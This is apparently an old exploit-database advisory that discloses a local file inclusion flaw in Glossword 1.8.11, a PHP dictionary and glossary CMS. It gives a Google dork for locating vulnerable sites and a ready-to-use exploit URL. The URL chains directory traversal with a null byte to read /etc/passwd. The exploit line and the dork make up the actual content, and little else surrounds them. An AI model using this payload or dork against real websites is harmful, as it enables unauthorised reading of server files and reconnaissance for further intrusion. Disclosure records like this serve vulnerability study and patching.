20 lines
No EOL
1.2 KiB
Text
20 lines
No EOL
1.2 KiB
Text
|-->Glossword 1.8.11 LFI
|
|
|-->CMS INFORMATION:
|
|
|
|
|
|-->WEB: http://code.google.com/p/glossword/
|
|
|-->DOWNLOAD: http://code.google.com/p/glossword/downloads/list
|
|
|-->DESCRIPTION: Glossword is a system written in PHP to create and publish online multilingual dictionary, glossary, or encyclopedia.
|
|
|
|
|
| CMS VULNERABILITY:
|
|
|
|
|
|-->TESTED ON: firefox 3
|
|
|-->DORK: "Powered by Glossword 1.8.11" , "Powered by Glossword 1.8.6" ...
|
|
|-->CATEGORY: LOCAL FILE INCLUSION (LFI)
|
|
|-->AFFECT VERSION: all > 1.8.11
|
|
|-->Author: t0fx
|
|
|-->GREETZ: europasecurity.org // security-shell.ws // str0ke // elitexbytes // Pig le marabou belge // p3lo // Sh0ck le congolais
|
|
|
|
|-->Exploit :
|
|
| http://www.website.fr/glossword_path/index.php?t=../../../../../../../../../../../../../etc/passwd%00
|
|
|
|
# milw0rm.com [2009-06-24] |